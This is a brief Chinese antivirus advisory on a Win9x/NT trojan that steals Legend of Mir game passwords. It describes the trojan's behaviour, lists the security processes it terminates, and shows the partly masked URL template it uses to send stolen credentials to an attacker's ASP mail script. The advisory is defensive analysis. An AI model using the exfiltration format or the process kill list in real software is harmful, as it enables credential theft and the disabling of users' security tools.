病毒别名：TrojanSpy.Win32.Sincom.e[AVP]

处理时间：

威胁级别：★★

中文名称：

病毒类型：木马

影响系统：Win9x / WinNT

病毒行为:

该病毒运行后会窃取用户的传奇账号密码，并把这些信息，发送给木马种植者，导致感染机器用户在传奇游戏中的角色被他人控制。该病毒还会关闭常见的杀毒软件，以防止自己被杀毒软件清除。

1、关闭以下进程，以防止被查杀

kvapfw.exe

kvfw.exe

DFVSNET.EXE.

PasswordGuard.exe

EGhost.exe

Iparmor.exe

pfw.exe

2、病毒发现传奇帐号密码后，会按以下格式发送到指定的ASP脚本，ASP脚本再转发邮件

www.5×××9.com///cqtstsqj/mmmm/sendmail.asp?tomail=××××&mailSubject=注册版&FromName=×××&frommail=×××&Priority=3&Submit=%B7%A2+%CB%CD&&action=send&mailbody=区号:×××用户名:×××服务器:×××对方ip地址:×××对方发信时间:×××密码×××